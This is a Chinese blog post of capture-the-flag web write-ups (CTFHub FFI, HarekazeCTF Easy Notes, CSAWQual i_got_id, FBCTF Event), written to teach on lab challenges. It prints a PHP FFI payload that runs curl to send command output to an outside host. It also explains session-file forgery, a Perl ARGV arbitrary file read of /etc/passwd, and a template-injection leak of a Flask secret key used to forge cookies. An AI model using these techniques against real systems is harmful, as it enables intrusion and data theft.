new_day2

最新推荐文章于 2024-09-30 14:29:19 发布
最新推荐文章于 2024-09-30 14:29:19 发布
阅读量69 收藏
点赞数
文章标签: php 数学建模 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64348326/article/details/131013175
版权

CTFHUB FFI拓展

1.FFI可以调用用户区的代码,也就是提供了执行c代码的功能。进入题目,发现开启了FFI拓展,包括请求ant参数。

2.调用FFI::cdef,然后参数值填写system命令的引用,最后执行命令返回读取根目录flag。
payload:

?ant=$a=FFI::cdef("int system(char *command);");$a->system('curl http://ip/?p=`/readflag|base64`');

[HarekazeCTF2019]Easy Notes

1.题目给了源代码,审计就行。发现读取getflag的条件是$_SESSION['admin']存在才行。那就需要找可以伪造session的点。

2.在config.php中,发现session保存目录是在/var/www/tmp下。而找到export.php也可以发现,我们导出的文件也保存在/tmp目录下面。也就是说,我们上传的文件导出时,它其实是会和session存放在同一个目录的。这就给我们伪造一个sess_文件提供了思路,同时看一下文件名的生成规则。

3.继续查看export.php,这个时候我们发现$filename它的生成规则是,获取用户名然后拼接-,再拼接一段8位随机数,最后加上.和我们传入的type参数文件名后缀。我们要生成session文件,那么肯定是不能有后缀的,所以到下面则有一个str_replace替换,它会将两个…替换为空。表示我们如果传入的type也为小数点时,那么两个小数点则会被替换为空,刚好删除了后缀。

4.那么接下来就是文件内容要包含我们的$_SESSION['admin']了。首先是session序列,默认session_start()存储格式是php:<键名>|<序列化的值>。马上我们找到导出文件的内容生成$notes = get_notes();找到该函数的文件lib.php

function get_notes() {
  if (!isset($_SESSION['notes'])) {
    $_SESSION['notes'] = [];
  }
  return $_SESSION['notes'];
}
function add_note($title, $body) {
  $notes = get_notes();
  array_push($notes, [
    'title' => $title,
    'body' => $body,
    'id' => hash('sha256', microtime())
  ]);
  $_SESSION['notes'] = $notes;
}

5.可以看见它是读取了$_SESSION['notes']的内容的,而该内容又是在add_note()方法中添加的,该方法又是在add.php中被调用的,它将我们写入的标题和内容存入到session[‘notes’]中。那么也就是说我们写入的session也可控了。

6.先添加一个用户,名字为session的前缀格式sess_。然后到添加文章add.php中,标题名写|N;admin|b:1;,内容任意。最后一步导出文件,类型为?type=.,此时就会在tmp目录下生成一个sess_-<8位随机数>文件,然后在响应头Content-Disposition:能读取到文件名。最后将-<8位随机数>替换session,访问getflag页面,成功读取flag。

[CSAWQual 2016]i_got_id

1.看后缀是perl写的,进入到上传页面,我们上传的文件它会原样输出到页面中。github上面题目的代码如下:

if ($cgi->upload('file')) {
    my $file = $cgi->param('file');
    while (<$file>) {
        print "$_";
        print "<br />";
    }
}

2.它获取到传入的file,然后进行打印操作。别人文章中解释的是:param()函数会返回一个列表的文件但是只有第一个文件会被放入到下面的file变量中。而对于下面的读文件逻辑来说,如果我们传入一个ARGV的文件,那么Perl会将传入的参数作为文件名读出来。这样,我们的利用方法就出现了:在正常的上传文件前面加上一个文件上传项ARGV,然后在URL中传入文件路径参数,这样就可以读取任意文件了。

3.看了以后还是没明白ARGV文件是什么,查询了一下。

  • Perl 自动提供一个名为@ARGV的数组,它包含来自命令行的所有值。并且该数组是不需声明的。
  • ARGV则是代表<>当前正在处理的文件句柄。例如下面的demo,它编译后使用shell> ./test.plx a.log b.log将会读取这两个文件的内容。
while(<>){
    print $_;
}

4.也就是说,当我们传入的file是ARGV时,它是作为数组参数传入的,使程序变成像命令行一样等待我们传值进去。当我们传入参数为文件名时,它会直接作为ARGV数组的参数被读取。所以,我们传?/flag /etc/passwd它就类似于shell> ./test.plx /flag /etc/passwd,可以直接读取两个文件的值。

[FBCTF2019]Event

1.进入题目,注册后查看源码,events_sesh_cookie解密没有发现什么特殊,而在user中发现/flag界面session需要为admin才能获得flag。

2.尝试泄露密钥,试了好几个地方都没发现ssti。后面看别的文章才知道真正的点是在event_important参数中,在这输入__class__能回显。

3.于是读取配置文件:__init__.__globals__[app].config,发现密钥fb+wwn!n1yo+9c(9s6!_3o#nqm&amp;&amp;_ej$tez)$_ik36n8d7o6mr#y,由于flask-session-cookie脚本需要两个参数,于是用网上脚本伪造生成cookie,替换访问即可获得flag。

光迹ovo
关注
add_days oracle_oracle 日期常用函数 (ADD_MONTHS,LAST_DAY,NEXT_DAY,MONTHS_BETWEEN,NEW_TIME,ROUND,TRUNC)...
weixin_42298415的博客
12-28 2789
Oracle在日期使用上允许极大的灵活性。由于可以在日期字段存储时间和日期,从而有函数可以既引用日期又引用时间。Oracle 所提供的一些日期函数如下所示。1. SYSDATE返回当前的日期和时间。示例SELECT sysdate FROM dual;SYSDATE----------05-3月 -032. ADD_MONTHS(d, no_of_month)当前日期"m"后推"no_of_mon...
SAP Fiori_Training_Day_2.pdf
07-02
Build a new project from template ▫ Consume an OData Service • Session 3: CDS consumption view (60 ▫ Basic CDS View concept ▫ UI & OData Annotations • Hands on 2: Model OData Service on CDS views...
CTFHUB web进阶学习
Je3Z的博客
09-12 1389
CTFHub之web进阶学习 Linux 动态加载器 ctfhub 动态加载器 linux–>ldd命令的介绍 就是没有x执行程序的权限,然后我们要执行/readflag来拿到flag,这里就用到了linux动态库链接器/加载器ld-linux.so.2 这里我们直接ldd /readflag 列出所需要得动态链接库 然后再/lib64/ld-linux-x86-64.so.2 /readflag 即可获取flag php Bypass disable_function LD_PRELOAD Linu
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2319
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
CTFHUB技能树(全详细解析含进阶)
热门推荐
hxhxhxhxx的博客
01-17 3万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
CTFHub之web进阶学习
bmth666的博客
01-13 2024
文章目录PHPBypass disable_functionLD_PRELOADShellShock(未完成)Apache Mod CGI(未完成) PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 w...
CTFHub Bypass disable_function系列(已完结)
feng的博客
10-14 3772
LD_PRELOAD 首先我们需要了解LD_PRELOAD这个环境变量,这里有两篇文章可以参考: 警惕UNIX下的LD_PRELOAD环境变量 利用环境变量LD_PRELOAD来绕过php%20disable_function 读完之后就会对LD_PRELOAD这个环境变量有所了解,知道了它是干什么的,但是对于如何利用还不太清楚。 利用这个环境变量的话,可以使用这些函数: putenv() error_log() mail() LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时
oracle时间函数,new_day()
梵城专栏
05-18 1358
1
java.sql.SQLException: HOUR_OF_DAY: 2 -> 3
梦想不会灭
05-09 4067
1、问题报错 2、原因 由于没过的夏令营导致的报错。 夏令时: 由于美国有夏令时,CST非夏令时对应 UTC-06:00,夏令时对应 UTC-05:00 。 美国的夏令时,从每年3月第2个星期天凌晨开始,到每年11月第1个星期天凌晨结束。 以2020年为例: 夏令时开始时间调整前:2020年03月08日星期日 02:00:00,时间向前拨一小时. 调整后:2020年03月08日星期日 03:00:00 夏令时结束时间调整前:2020年11月01日星期日 02:00:00,时间往回拨一小时. 调整后:202
TypeError: ‘day‘ is an invalid keyword argument for __new__()
carrional的博客
09-29 928
TypeError: 'day' is an invalid keyword argument for __new__()
Java 程序读取Mysql数据库时间信息与真实时间相差 13、14 小时、SQLException: HOUR_OF_DAY: 2 -> 3
江城宴的博客
10-12 4756
CST时区引起的异常: Java 程序读取Mysql数据库时间信息,与真实时间相差 13、14 小时 java.sql.SQLException: HOUR_OF_DAY: 2 -> 3 原因: Mysql 驱动:mysql-connector-java 升级到8版本后。将数据库时间解析到java时间,需要获取数据库的时区。 java如何数据库时区: 1、数据库连接中指明的时区,就用该时区,优先级最高。datasource.urljdbc:mysql://127.0.0.1:3306/your
YMDSelect.zip_NEW_YMDClass.js_select YMDselect
09-23
年月日联动下拉选择JS封装类 年月联动 new YMDselect( year1 , month1 ) new YMDselect( year1 , month1 ,1990) new YMDselect( year1 , month1 ,1990,2... new YMDselect( year1 , month1 , day1 ,1990,2,10)
澳新银行ANZBank-201506_ANZ Investor Day Auckland New Zealand_final_commercial_agri_By_MD.pdf
09-10
澳新银行ANZBank-201506_ANZ Investor Day Auckland New Zealand_final_commercial_agri_By_MD.pdf
澳新银行ANZBank-201506_ANZ Investor Day Auckland, New Zealand_final_institutional_By_MD.pdf
09-10
澳新银行ANZBank-201506_ANZ Investor Day Auckland, New Zealand_final_institutional_By_MD.pdf
[NewStarCTF 2023 公开赛道]Begin of PHP1
alwtj的博客
09-26 491
LEVEL5: 哈哈又是数组绕过,这里要输入的POST内容不能是字母和数字,所以我们可以用数组,当然也可以不用只要输入的value为真且不是正则表达是匹配到的范围就可以了,flag5=. ,或者flag5[]=love。LEVEL1: 因为hash函数无法解析数组会返回false,直接用数组绕过key1[]=1&key2[]=2。LEVEL4: 没错继续用数组绕过,is_numeric()无法解析数组会返回false,而且数组大于2023.至于为什么大于2023,我们来做个小实验.key5[]=5。
PHP反序列化2(OC绕过.wakeup绕过)
2302_81328699的博客
09-26 575
PHP反序列化2(OC绕过.wakeup绕过)
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 1122
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
php socket客户端
qq_30754685的博客
09-30 270
在软件管理里面安装composer,再在网站管理安装扩展socket。使用的工具为phpstudy。
第168天:应急响应-ELK 日志分析系统&Yara规则&样本识别&特征提取&规则编写
最新发布
weixin_71529930的博客
09-30 935
案例一:ELK 搭建使用-导入文件&监控日志&语法筛选该软件是专业分析日志的工具,但是不支持安全软件的分析这里我是在kali中搭建的搭建参考文章:(第一篇成功,第二篇呢可能是国外的docker关闭了未成功)(本地搭建)(docker搭建)安装完成的界面三种模式选择日志上传上传文件导入命名并导入上传完成以后去查看可以根据不同类别去分类查看IP时间戳ua头这里看到呢ua头有个sqlmap直接定位搜索特征字符不是单独出现,需要在前后加上*
ALTER TABLE cdata_safe_income_new_day_analysis_item_status DROP PARTITION (ds_${YYYYMMDD});ALTER TABLE cdata_safe_income_new_day_analysis_item_status ADD PARTITION ds_${YYYYMMDD} VALUES IN ( ${YYYYMMDD} ) ;
07-11
2. `ALTER TABLE cdata_safe_income_new_day_analysis_item_status ADD PARTITION ds_${YYYYMMDD} VALUES IN ( ${YYYYMMDD} );` 表示添加一个名为 `ds_${YYYYMMDD}` 的分区。同样,`${YYYYMMDD}` 是一个占位符,实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值